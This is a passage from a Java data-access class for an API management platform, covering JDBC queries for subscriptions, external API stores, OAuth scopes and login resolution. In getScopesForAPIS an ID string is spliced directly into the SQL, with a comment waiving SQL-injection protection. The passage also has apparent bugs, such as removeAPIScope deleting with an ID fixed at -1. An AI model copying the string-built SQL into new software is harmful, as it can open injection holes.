occurred while getting workflow entry for " + "User signup : " + usernameWithDomain, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return workflowExtRef; } /** * Retrieves IDs of pending subscriptions for a given application * * @param applicationId application id of the application * @return Set containing subscription id list * @throws APIManagementException */ public Set<Integer> getPendingSubscriptionsByApplicationId(int applicationId) throws APIManagementException { Set<Integer> pendingSubscriptions = new HashSet<Integer>(); Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = SQLConstants.GET_PAGINATED_SUBSCRIPTIONS_BY_APPLICATION_SQL; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setInt(1, applicationId); ps.setString(2, APIConstants.SubscriptionStatus.ON_HOLD); rs = ps.executeQuery(); while (rs.next()) { pendingSubscriptions.add(rs.getInt("SUBSCRIPTION_ID")); } } catch (SQLException e) { handleException("Error occurred while getting subscription entries for " + "Application : " + applicationId, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return pendingSubscriptions; } /** * Retrieves registration workflow reference for applicationId and key type * * @param applicationId id of the application with registration * @param keyType key type of the registration * @return workflow reference of the registration * @throws APIManagementException */ public String getRegistrationWFReference(int applicationId, String keyType) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String reference = null; String sqlQuery = SQLConstants.GET_REGISTRATION_WORKFLOW_SQL; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setInt(1, applicationId); ps.setString(2, keyType); rs = ps.executeQuery(); // returns only one row while (rs.next()) { reference = rs.getString("WF_REF"); } } catch (SQLException e) { handleException("Error occurred while getting registration entry for " + "Application : " + applicationId, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return reference; } /** * Retrives subscription status for APIIdentifier and applicationId * * @param identifier api identifier subscribed * @param applicationId application with subscription * @return subscription status * @throws APIManagementException */ public String getSubscriptionStatus(APIIdentifier identifier, int applicationId) throws APIManagementException { String status = null; Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = SQLConstants.GET_SUBSCRIPTION_STATUS_SQL; try { conn = APIMgtDBUtil.getConnection(); int apiId = getAPIID(identifier, conn); ps = conn.prepareStatement(sqlQuery); ps.setInt(1, apiId); ps.setInt(2, applicationId); rs = ps.executeQuery(); // returns only one row while (rs.next()) { status = rs.getString("SUB_STATUS"); } } catch (SQLException e) { handleException("Error occurred while getting subscription entry for " + "Application : " + applicationId + ", API: " + identifier, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return status; } /** * Retrieve subscription create state for APIIdentifier and applicationID * * @param identifier - api identifier which is subscribed * @param applicationId - application used to subscribed * @param connection * @return subscription create status * @throws APIManagementException */ public String getSubscriptionCreaeteStatus(APIIdentifier identifier, int applicationId, Connection connection) throws APIManagementException { String status = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = SQLConstants.GET_SUBSCRIPTION_CREATION_STATUS_SQL; try { int apiId = getAPIID(identifier, connection); ps = connection.prepareStatement(sqlQuery); ps.setInt(1, apiId); ps.setInt(2, applicationId); rs = ps.executeQuery(); // returns only one row while (rs.next()) { status = rs.getString("SUBS_CREATE_STATE"); } } catch (SQLException e) { handleException("Error occurred while getting subscription entry for " + "Application : " + applicationId + ", API: " + identifier, e); } finally { APIMgtDBUtil.closeAllConnections(ps, null, rs); } return status; } private class SubscriptionInfo { private int subscriptionId; private String tierId; private int applicationId; private String accessToken; private String tokenType; } /** * Identify whether the loggedin user used his ordinal username or email * * @param userId * @return */ private boolean isUserLoggedInEmail(String userId) { return userId.contains("@"); } /** * Identify whether the loggedin user used his Primary Login name or Secondary login name * * @param userId * @return */ private boolean isSecondaryLogin(String userId) { Map<String, Map<String, String>> loginConfiguration = ServiceReferenceHolder.getInstance() .getAPIManagerConfigurationService().getAPIManagerConfiguration().getLoginConfiguration(); if (loginConfiguration.get(APIConstants.EMAIL_LOGIN) != null) { Map<String, String> emailConf = loginConfiguration.get(APIConstants.EMAIL_LOGIN); if ("true".equalsIgnoreCase(emailConf.get(APIConstants.PRIMARY_LOGIN))) { return !isUserLoggedInEmail(userId); } if ("false".equalsIgnoreCase(emailConf.get(APIConstants.PRIMARY_LOGIN))) { return isUserLoggedInEmail(userId); } } if (loginConfiguration.get(APIConstants.USERID_LOGIN) != null) { Map<String, String> userIdConf = loginConfiguration.get(APIConstants.USERID_LOGIN); if ("true".equalsIgnoreCase(userIdConf.get(APIConstants.PRIMARY_LOGIN))) { return isUserLoggedInEmail(userId); } if ("false".equalsIgnoreCase(userIdConf.get(APIConstants.PRIMARY_LOGIN))) { return !isUserLoggedInEmail(userId); } } return false; } /** * Get the primaryLogin name using secondary login name. Primary secondary * Configuration is provided in the identitiy.xml. In the userstore, it is * users responsibility TO MAINTAIN THE SECONDARY LOGIN NAME AS UNIQUE for * each and every users. If it is not unique, we will pick the very first * entry from the userlist. * * @param login * @return * @throws APIManagementException */ private String getPrimaryLoginFromSecondary(String login) throws APIManagementException { Map<String, Map<String, String>> loginConfiguration = ServiceReferenceHolder.getInstance() .getAPIManagerConfigurationService().getAPIManagerConfiguration().getLoginConfiguration(); String claimURI, username = null; if (isUserLoggedInEmail(login)) { Map<String, String> emailConf = loginConfiguration.get(APIConstants.EMAIL_LOGIN); claimURI = emailConf.get(APIConstants.CLAIM_URI); } else { Map<String, String> userIdConf = loginConfiguration.get(APIConstants.USERID_LOGIN); claimURI = userIdConf.get(APIConstants.CLAIM_URI); } try { RemoteUserManagerClient rmUserClient = new RemoteUserManagerClient(login); String[] user = rmUserClient.getUserList(claimURI, login); if (user.length > 0) { username = user[0]; } } catch (Exception e) { handleException("Error while retrieving the primaryLogin name using secondary loginName : " + login, e); } return username; } /** * identify the login username is primary or secondary * * @param userID * @return * @throws APIManagementException */ private String getLoginUserName(String userID) throws APIManagementException { String primaryLogin = userID; if (isSecondaryLogin(userID)) { primaryLogin = getPrimaryLoginFromSecondary(userID); } return primaryLogin; } /** * Store external APIStore details to which APIs successfully published * * @param apiId APIIdentifier * @param apiStoreSet APIStores set * @return added/failed * @throws APIManagementException */ public boolean addExternalAPIStoresDetails(APIIdentifier apiId, Set<APIStore> apiStoreSet) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; boolean state = false; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); //This query to add external APIStores to database table String sqlQuery = SQLConstants.ADD_EXTERNAL_API_STORE_SQL; //Get API Id int apiIdentifier; apiIdentifier = getAPIID(apiId, conn); if (apiIdentifier == -1) { String msg = "Could not load API record for: " + apiId.getApiName(); log.error(msg); } ps = conn.prepareStatement(sqlQuery); for (Object storeObject : apiStoreSet) { APIStore store = (APIStore) storeObject; ps.setInt(1, apiIdentifier); ps.setString(2, store.getName()); ps.setString(3, store.getDisplayName()); ps.setString(4, store.getEndpoint()); ps.setString(5, store.getType()); ps.addBatch(); } ps.executeBatch(); conn.commit(); state = true; } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback storing external apistore details ", e1); } } log.error("Failed to store external apistore details", e); state = false; } catch (APIManagementException e) { log.error("Failed to store external apistore details", e); state = false; } finally { APIMgtDBUtil.closeAllConnections(ps, conn, null); } return state; } /** * Delete the records of external APIStore details. * * @param apiId APIIdentifier * @param apiStoreSet APIStores set * @return added/failed * @throws APIManagementException */ public boolean deleteExternalAPIStoresDetails(APIIdentifier apiId, Set<APIStore> apiStoreSet) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; boolean state = false; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); String sqlQuery = SQLConstants.REMOVE_EXTERNAL_API_STORE_SQL; //Get API Id int apiIdentifier; apiIdentifier = getAPIID(apiId, conn); if (apiIdentifier == -1) { String msg = "Could not load API record for: " + apiId.getApiName(); log.error(msg); } ps = conn.prepareStatement(sqlQuery); for (Object storeObject : apiStoreSet) { APIStore store = (APIStore) storeObject; ps.setInt(1, apiIdentifier); ps.setString(2, store.getName()); ps.setString(3, store.getType()); ps.addBatch(); } ps.executeBatch(); conn.commit(); state = true; } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback deleting external apistore details ", e1); } } log.error("Failed to delete external apistore details", e); state = false; } catch (APIManagementException e) { log.error("Failed to delete external apistore details", e); state = false; } finally { APIMgtDBUtil.closeAllConnections(ps, conn, null); } return state; } public void updateExternalAPIStoresDetails(APIIdentifier apiId, Set<APIStore> apiStoreSet) throws APIManagementException { Connection conn = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); updateExternalAPIStoresDetails(apiId, apiStoreSet, conn); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback updating external apistore details ", e1); } } log.error("Failed to update external apistore details", e); } catch (APIManagementException e) { log.error("Failed to updating external apistore details", e); } finally { APIMgtDBUtil.closeAllConnections(null, conn, null); } } /** * Updateexternal APIStores details to which APIs published * * @param apiIdentifier API Identifier * @throws APIManagementException if failed to add Application */ public void updateExternalAPIStoresDetails(APIIdentifier apiIdentifier, Set<APIStore> apiStoreSet, Connection conn) throws APIManagementException, SQLException { PreparedStatement ps = null; try { conn.setAutoCommit(false); //This query to add external APIStores to database table String sqlQuery = SQLConstants.UPDATE_EXTERNAL_API_STORE_SQL; ps = conn.prepareStatement(sqlQuery); //Get API Id int apiId; apiId = getAPIID(apiIdentifier, conn); if (apiId == -1) { String msg = "Could not load API record for: " + apiIdentifier.getApiName(); log.error(msg); } for (Object storeObject : apiStoreSet) { APIStore store = (APIStore) storeObject; ps.setString(1, store.getEndpoint()); ps.setString(2, store.getType()); ps.setInt(3, apiId); ps.setString(4, store.getName()); ps.addBatch(); } ps.executeBatch(); ps.clearBatch(); conn.commit(); } catch (SQLException e) { log.error("Error while updating External APIStore details to the database for API : ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, null, null); } } /** * Return external APIStore details on successfully APIs published * * @param apiId APIIdentifier * @return Set of APIStore * @throws APIManagementException */ public Set<APIStore> getExternalAPIStoresDetails(APIIdentifier apiId) throws APIManagementException { Connection conn = null; Set<APIStore> storesSet = new HashSet<APIStore>(); try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); storesSet = getExternalAPIStoresDetails(apiId, conn); conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback getting external apistore details ", e1); } } log.error("Failed to get external apistore details", e); } catch (APIManagementException e) { log.error("Failed to get external apistore details", e); } finally { APIMgtDBUtil.closeAllConnections(null, conn, null); } return storesSet; } /** * Get external APIStores details which are stored in database * * @param apiIdentifier API Identifier * @throws APIManagementException if failed to get external APIStores */ public Set<APIStore> getExternalAPIStoresDetails(APIIdentifier apiIdentifier, Connection conn) throws APIManagementException, SQLException { PreparedStatement ps = null; ResultSet rs = null; Set<APIStore> storesSet = new HashSet<APIStore>(); try { conn = APIMgtDBUtil.getConnection(); //This query to add external APIStores to database table String sqlQuery = SQLConstants.GET_EXTERNAL_API_STORE_DETAILS_SQL; ps = conn.prepareStatement(sqlQuery); int apiId; apiId = getAPIID(apiIdentifier, conn); if (apiId == -1) { String msg = "Could not load API record for: " + apiIdentifier.getApiName(); log.error(msg); throw new APIManagementException(msg); } ps.setInt(1, apiId); rs = ps.executeQuery(); while (rs.next()) { APIStore store = new APIStore(); store.setName(rs.getString("STORE_ID")); store.setDisplayName(rs.getString("STORE_DISPLAY_NAME")); store.setEndpoint(rs.getString("STORE_ENDPOINT")); store.setType(rs.getString("STORE_TYPE")); store.setPublished(true); storesSet.add(store); } } catch (SQLException e) { handleException("Error while getting External APIStore details from the database for the API : " + apiIdentifier.getApiName() + '-' + apiIdentifier.getVersion(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return storesSet; } public void addScopes(Set<?> objects, APIIdentifier apiIdentifier, int apiID, int tenantID) throws APIManagementException { Connection conn = null; PreparedStatement ps = null, ps2 = null, ps3 = null; ResultSet rs = null; String scopeEntry = SQLConstants.ADD_SCOPE_ENTRY_SQL; String scopeRoleEntry = SQLConstants.ADD_SCOPE_ROLE_SQL; String scopeLink = SQLConstants.ADD_SCOPE_LINK_SQL; Boolean scopeSharingEnabled = false; if (!StringUtils.isEmpty(System.getProperty(APIConstants.ENABLE_API_SCOPES_SHARING))) { scopeSharingEnabled = Boolean.parseBoolean(System.getProperty(APIConstants.ENABLE_API_SCOPES_SHARING)); } try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); String scopeId = "SCOPE_ID"; if (conn.getMetaData().getDriverName().contains("PostgreSQL")) { scopeId = "scope_id"; } if (objects != null) { for (Object object : objects) { ps = conn.prepareStatement(scopeEntry, new String[]{scopeId}); ps2 = conn.prepareStatement(scopeLink); ps3 = conn.prepareStatement(scopeRoleEntry); if (object instanceof URITemplate) { URITemplate uriTemplate = (URITemplate) object; if (uriTemplate.getScope() == null) { continue; } if (!scopeSharingEnabled && isScopeKeyAssigned(apiIdentifier, uriTemplate.getScope().getKey(), tenantID)) { throw new APIManagementException("Scope '" + uriTemplate.getScope().getKey() + "' " + "is already used by another API."); } ps.setString(1, uriTemplate.getScope().getKey()); ps.setString(2, uriTemplate.getScope().getName()); ps.setString(3, uriTemplate.getScope().getDescription()); ps.setInt(4, tenantID); ps.execute(); rs = ps.getGeneratedKeys(); if (rs.next()) { uriTemplate.getScope().setId(rs.getInt(1)); } String roles = uriTemplate.getScope().getRoles(); //Adding scope bindings List<String> roleList = Lists.newArrayList(Splitter.on(",").trimResults().split(roles)); for (String role : roleList) { ps3.setInt(1, uriTemplate.getScope().getId()); ps3.setString(2, role); ps3.addBatch(); } ps3.executeBatch(); ps2.setInt(1, apiID); ps2.setInt(2, uriTemplate.getScope().getId()); ps2.execute(); conn.commit(); } else if (object instanceof Scope) { Scope scope = (Scope) object; if (!scopeSharingEnabled && isScopeKeyAssigned(apiIdentifier, scope.getKey(), tenantID)) { throw new APIManagementException("Scope '" + scope.getKey() + "' is already used " + "by another API."); } ps.setString(1, scope.getKey()); ps.setString(2, scope.getName()); ps.setString(3, scope.getDescription()); ps.setInt(4, tenantID); ps.execute(); rs = ps.getGeneratedKeys(); if (rs.next()) { scope.setId(rs.getInt(1)); } String roles = scope.getRoles(); //Adding scope bindings List<String> roleList = Lists.newArrayList(Splitter.on(",").trimResults().split(roles)); for (String role : roleList) { ps3.setInt(1, scope.getId()); ps3.setString(2, role); ps3.addBatch(); } ps3.executeBatch(); ps2.setInt(1, apiID); ps2.setInt(2, scope.getId()); ps2.execute(); conn.commit(); } } } } catch (SQLException e) { try { if (conn != null) { conn.rollback(); } } catch (SQLException e1) { handleException("Error occurred while Rolling back changes done on Scopes Creation", e1); } handleException("Error occurred while creating scopes ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); APIMgtDBUtil.closeAllConnections(ps2, null, null); } } /** * Check a given scope key already exist for a tenant * * @param scopeKey Scope Key * @param tenantId Tenant ID * @return true if scope already exists * @throws APIManagementException if an error occurs while executing db query */ private boolean isScopeExists(String scopeKey, int tenantId) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; try { conn = APIMgtDBUtil.getConnection(); String sqlQuery = SQLConstants.GET_SCOPES_SQL; ps = conn.prepareStatement(sqlQuery); ps.setString(1, scopeKey); ps.setInt(2, tenantId); resultSet = ps.executeQuery(); if (resultSet.next()) { if (log.isDebugEnabled()) { log.debug("Scope key " + scopeKey + " for tenant " + tenantId + " exists."); } return true; } } catch (SQLException e) { handleException("Failed to check scope exists for scope " + scopeKey, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return false; } public Set<Scope> getAPIScopes(APIIdentifier identifier) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; HashMap<Integer, Scope> scopeHashMap = new HashMap<>(); int apiId; try { conn = APIMgtDBUtil.getConnection(); apiId = getAPIID(identifier, conn); String sqlQuery = SQLConstants.GET_API_SCOPES_SQL; if (conn.getMetaData().getDriverName().contains("Oracle")) { sqlQuery = SQLConstants.GET_API_SCOPES_ORACLE_SQL; } ps = conn.prepareStatement(sqlQuery); ps.setInt(1, apiId); resultSet = ps.executeQuery(); while (resultSet.next()) { Scope scope; int scopeId = resultSet.getInt(1); if (scopeHashMap.containsKey(scopeId)) { // scope already exists append roles. scope = scopeHashMap.get(scopeId); scope.setRoles(scope.getRoles().concat("," + resultSet.getString(5)).trim()); } else { scope = new Scope(); scope.setId(scopeId); scope.setKey(resultSet.getString(2)); scope.setName(resultSet.getString(3)); scope.setDescription(resultSet.getString(4)); scope.setRoles(resultSet.getString(5).trim()); } scopeHashMap.put(scopeId, scope); } } catch (SQLException e) { handleException("Failed to retrieve api scopes ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return populateScopeSet(scopeHashMap); } public void addScopes(Connection conn, Set<?> objects, int api_id, int tenantID) throws APIManagementException { PreparedStatement ps = null; ResultSet rs = null; List<Integer> scopeIds = new ArrayList<Integer>(); String scopeEntry = SQLConstants.ADD_SCOPE_ENTRY_SQL; try { String scopeId = "SCOPE_ID"; if (conn.getMetaData().getDriverName().contains("PostgreSQL")) { scopeId = "scope_id"; } if (objects != null) { for (Object object : objects) { ps = conn.prepareStatement(scopeEntry, new String[]{scopeId}); if (object instanceof URITemplate) { URITemplate uriTemplate = (URITemplate) object; if (uriTemplate.getScope() == null) { continue; } ps.setString(1, uriTemplate.getScope().getKey()); ps.setString(2, uriTemplate.getScope().getName()); ps.setString(3, uriTemplate.getScope().getDescription()); ps.setInt(4, tenantID); ps.setString(5, uriTemplate.getScope().getRoles()); ps.execute(); rs = ps.getGeneratedKeys(); if (rs.next()) { int scopeIdValue = rs.getInt(1); uriTemplate.getScope().setId(scopeIdValue); scopeIds.add(scopeIdValue); } } else if (object instanceof Scope) { Scope scope = (Scope) object; ps.setString(1, scope.getKey()); ps.setString(2, scope.getName()); ps.setString(3, scope.getDescription()); ps.setInt(4, tenantID); ps.setString(5, scope.getRoles()); ps.execute(); rs = ps.getGeneratedKeys(); if (rs.next()) { int scopeIdValue = rs.getInt(1); scope.setId(scopeIdValue); scopeIds.add(scopeIdValue); } } } addScopeLinks(conn, scopeIds, api_id); } } catch (SQLException e) { handleException("Error occurred while creating scopes ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, null, rs); } } private void addScopeLinks(Connection connection, List<Integer> scopeIds, int apiId) throws APIManagementException { String scopeLink = SQLConstants.ADD_SCOPE_LINK_SQL; PreparedStatement ps = null; try { if (scopeIds != null) { ps = connection.prepareStatement(scopeLink); for (Integer scopeId : scopeIds) { ps.setInt(1, apiId); ps.setInt(2, scopeId); ps.addBatch(); } ps.executeBatch(); } } catch (SQLException e) { handleException("Error occurred while creating scope links ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, null, null); } } /** * Generate Set<Scope> from HashMap * * @return Set of Scopes populated with roles. */ private Set<Scope> populateScopeSet(HashMap<?, Scope> scopeHashMap) { Set<Scope> scopes = new LinkedHashSet<Scope>(); for (Scope scope : scopeHashMap.values()) { scopes.add(scope); } return scopes; } /** * Returns all the scopes assigned for given apis * * @param apiIdsString list of api ids separated by commas * @return Map<String, Set<Scope>> set of scopes for each apiId * @throws APIManagementException */ public Map<String, Set<Scope>> getScopesForAPIS(String apiIdsString) throws APIManagementException { ResultSet resultSet = null; PreparedStatement ps = null; Map<String, Set<Scope>> apiScopeSet = new HashMap<String, Set<Scope>>(); try (Connection conn = APIMgtDBUtil.getConnection()) { String sqlQuery = SQLConstants.GET_SCOPES_FOR_API_LIST; if (conn.getMetaData().getDriverName().contains("Oracle")) { sqlQuery = SQLConstants.GET_SCOPES_FOR_API_LIST_ORACLE; } // apids are retrieved from the db so no need to protect for sql injection sqlQuery = sqlQuery.replace("$paramList", apiIdsString); ps = conn.prepareStatement(sqlQuery); resultSet = ps.executeQuery(); while (resultSet.next()) { String apiId = resultSet.getString(1); Scope scope = new Scope(); scope.setId(resultSet.getInt(2)); scope.setName(resultSet.getString(3)); scope.setDescription(resultSet.getString(4)); Set<Scope> scopeList = apiScopeSet.get(apiId); if (scopeList == null) { scopeList = new LinkedHashSet<Scope>(); scopeList.add(scope); apiScopeSet.put(apiId, scopeList); } else { scopeList.add(scope); apiScopeSet.put(apiId, scopeList); } } } catch (SQLException e) { handleException("Failed to retrieve api scopes ", e); } return apiScopeSet; } public Set<Scope> getScopesBySubscribedAPIs(List<APIIdentifier> identifiers) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; List<Integer> apiIds = new ArrayList<Integer>(); HashMap<String, Scope> scopeHashMap = new HashMap<>(); try { conn = APIMgtDBUtil.getConnection(); for (APIIdentifier identifier : identifiers) { apiIds.add(getAPIID(identifier, conn)); } String commaSeparatedIds = StringUtils.join(apiIds.iterator(), ','); String sqlQuery = SQLConstants.GET_SCOPE_BY_SUBSCRIBED_API_PREFIX + commaSeparatedIds + SQLConstants .GET_SCOPE_BY_SUBSCRIBED_ID_SUFFIX; if (conn.getMetaData().getDriverName().contains("Oracle")) { sqlQuery = SQLConstants.GET_SCOPE_BY_SUBSCRIBED_ID_ORACLE_SQL + commaSeparatedIds + SQLConstants.GET_SCOPE_BY_SUBSCRIBED_ID_SUFFIX; } ps = conn.prepareStatement(sqlQuery); resultSet = ps.executeQuery(); while (resultSet.next()) { Scope scope; String scopeKey = resultSet.getString(1); if (scopeHashMap.containsKey(scopeKey)) { // scope already exists append roles. scope = scopeHashMap.get(scopeKey); String roles = scope.getRoles(); if (StringUtils.isNotEmpty(roles)) { scope.setRoles(scope.getRoles().concat("," + resultSet.getString(4)).trim()); } } else { scope = new Scope(); scope.setKey(scopeKey); scope.setName(resultSet.getString(2)); scope.setDescription(resultSet.getString(3)); String roles = resultSet.getString(4); if (StringUtils.isNotEmpty(roles)) { scope.setRoles(resultSet.getString(4).trim()); } } scopeHashMap.put(scopeKey, scope); } } catch (SQLException e) { handleException("Failed to retrieve api scopes ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return populateScopeSet(scopeHashMap); } public Set<Scope> getAPIScopesByScopeKey(String scopeKey, int tenantId) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; HashMap<Integer, Scope> scopeHashMap = new HashMap<>(); try { String sqlQuery = SQLConstants.GET_SCOPES_BY_SCOPE_KEY_SQL; conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, scopeKey); ps.setInt(2, tenantId); resultSet = ps.executeQuery(); while (resultSet.next()) { Scope scope; int scopeId = resultSet.getInt(1); if (scopeHashMap.containsKey(scopeId)) { // scope already exists append roles. scope = scopeHashMap.get(scopeId); scope.setRoles(scope.getRoles().concat("," + resultSet.getString(5)).trim()); } else { scope = new Scope(); scope.setId(scopeId); scope.setKey(resultSet.getString(2)); scope.setName(resultSet.getString(3)); scope.setDescription(resultSet.getString(4)); scope.setRoles(resultSet.getString(5).trim()); } scopeHashMap.put(scopeId, scope); } } catch (SQLException e) { handleException("Failed to retrieve api scopes ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return populateScopeSet(scopeHashMap); } public Set<Scope> getScopesByScopeKeys(String scopeKeys, int tenantId) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; List<String> inputScopeList = Arrays.asList(scopeKeys.split(" ")); StringBuilder placeHolderBuilder = new StringBuilder(); HashMap<Integer, Scope> scopeHashMap = new HashMap<>(); for (int i = 0; i < inputScopeList.size(); i++) { placeHolderBuilder.append("?, "); } String placeHolderStr = placeHolderBuilder.deleteCharAt(placeHolderBuilder.length() - 2).toString(); try { conn = APIMgtDBUtil.getConnection(); String sqlQuery = SQLConstants.GET_SCOPES_BY_SCOPE_KEYS_PREFIX + placeHolderStr + SQLConstants .GET_SCOPES_BY_SCOPE_KEYS_SUFFIX; if (conn.getMetaData().getDriverName().contains("Oracle")) { sqlQuery = SQLConstants.GET_SCOPES_BY_SCOPE_KEYS_PREFIX_ORACLE + placeHolderStr + SQLConstants.GET_SCOPES_BY_SCOPE_KEYS_SUFFIX; } ps = conn.prepareStatement(sqlQuery); for (int i = 0; i < inputScopeList.size(); i++) { ps.setString(i + 1, inputScopeList.get(i)); } ps.setInt(inputScopeList.size() + 1, tenantId); resultSet = ps.executeQuery(); while (resultSet.next()) { Scope scope; int scopeId = resultSet.getInt(1); if (scopeHashMap.containsKey(scopeId)) { // scope already exists append roles. scope = scopeHashMap.get(scopeId); scope.setRoles(scope.getRoles().concat("," + resultSet.getString(6)).trim()); } else { scope = new Scope(); scope.setId(scopeId); scope.setKey(resultSet.getString(2)); scope.setName(resultSet.getString(3)); scope.setDescription(resultSet.getString(4)); scope.setRoles(resultSet.getString(6).trim()); } scopeHashMap.put(scopeId, scope); } } catch (SQLException e) { handleException("Failed to retrieve api scopes ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return populateScopeSet(scopeHashMap); } /** * update URI templates define for an API * * @param api * @throws APIManagementException */ public void updateScopes(API api, int tenantId) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; int apiId = -1; String deleteResourceScopes = SQLConstants.REMOVE_RESOURCE_SCOPE_SQL; String deleteScopes = SQLConstants.REMOVE_SCOPE_SQL; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); apiId = getAPIID(api.getId(), connection); if (apiId == -1) { //application addition has failed return; } prepStmt = connection.prepareStatement(deleteResourceScopes); prepStmt.setInt(1, apiId); prepStmt.execute(); prepStmt = connection.prepareStatement(deleteScopes); prepStmt.setInt(1, apiId); prepStmt.execute(); connection.commit(); } catch (SQLException e) { try { if (connection != null) { connection.rollback(); } } catch (SQLException e1) { handleException("Error occurred while Rolling back changes done on Scopes updating", e1); } handleException("Error while updating Scopes for API : " + api.getId(), e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, null); } addScopes(api.getUriTemplates(), api.getId(), apiId, tenantId); } public HashMap<String, String> getResourceToScopeMapping(APIIdentifier identifier) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; HashMap<String, String> map = new HashMap<String, String>(); int apiId; try { String sqlQuery = SQLConstants.GET_RESOURCE_TO_SCOPE_MAPPING_SQL; apiId = getAPIID(identifier, conn); conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setInt(1, apiId); resultSet = ps.executeQuery(); while (resultSet.next()) { map.put(resultSet.getString(1), resultSet.getString(2)); } } catch (SQLException e) { handleException("Failed to retrieve api scopes ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return map; } public Map<String, String> getScopeRolesOfApplication(String consumerKey) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; try { conn = APIMgtDBUtil.getConnection(); String sqlQuery = SQLConstants.GET_SCOPE_ROLES_OF_APPLICATION_SQL; ps = conn.prepareStatement(sqlQuery); ps.setString(1, consumerKey); resultSet = ps.executeQuery(); Map<String, String> scopes = new HashMap<String, String>(); while (resultSet.next()) { if (scopes.containsKey(resultSet.getString(1))) { // Role for the scope exists. Append the new role. String roles = scopes.get(resultSet.getString(1)); roles += "," + resultSet.getString(2); scopes.put(resultSet.getString(1), roles); } else { scopes.put(resultSet.getString(1), resultSet.getString(2)); } } return scopes; } catch (SQLException e) { handleException("Failed to retrieve scopes of application" + consumerKey, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return null; } /** * Remove scope entries from DB, when delete APIs * * @param apiIdentifier The {@link APIIdentifier} of the API */ private void removeAPIScope(APIIdentifier apiIdentifier) throws APIManagementException { Set<Scope> scopes = getAPIScopes(apiIdentifier); Connection connection = null; PreparedStatement prepStmt = null; PreparedStatement deleteOauth2ResourceScopePrepStmt = null; PreparedStatement deleteOauth2ScopePrepStmt = null; int scopeId; int apiId = -1; String deleteAPIScopeQuery = SQLConstants.REMOVE_FROM_API_SCOPES_SQL; String deleteOauth2ScopeQuery = SQLConstants.REMOVE_FROM_OAUTH_SCOPE_SQL; String deleteOauth2ResourceScopeQuery = SQLConstants.REMOVE_FROM_OAUTH_RESOURCE_SQL; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); prepStmt = connection.prepareStatement(deleteAPIScopeQuery); prepStmt.setInt(1, apiId); prepStmt.execute(); if (!scopes.isEmpty()) { deleteOauth2ResourceScopePrepStmt = connection.prepareStatement(deleteOauth2ResourceScopeQuery); deleteOauth2ScopePrepStmt = connection.prepareStatement(deleteOauth2ScopeQuery); for (Scope scope : scopes) { scopeId = scope.getId(); deleteOauth2ResourceScopePrepStmt.setInt(1, scopeId); deleteOauth2ResourceScopePrepStmt.addBatch(); deleteOauth2ScopePrepStmt.setInt(1, scopeId); deleteOauth2ScopePrepStmt.addBatch(); } deleteOauth2ResourceScopePrepStmt.executeBatch(); deleteOauth2ScopePrepStmt.executeBatch(); } connection.commit(); } catch (SQLException e) { handleException("Error while removing the scopes for the API: " + apiIdentifier.getApiName() + " from the database", e); } finally { APIMgtDBUtil.closeAllConnections(deleteOauth2ResourceScopePrepStmt, null, null); APIMgtDBUtil.closeAllConnections(deleteOauth2ScopePrepStmt, null, null); APIMgtDBUtil.closeAllConnections(prepStmt, connection, null); } } /** * Delete a user subscription based on API_ID, APP_ID, TIER_ID * * @param apiId - subscriber API ID * @param appId - application ID used to subscribe * @throws java.sql.SQLException - Letting the caller to handle the roll back */ private void deleteSubscriptionByApiIDAndAppID(int apiId, int appId, Connection conn) throws SQLException { String 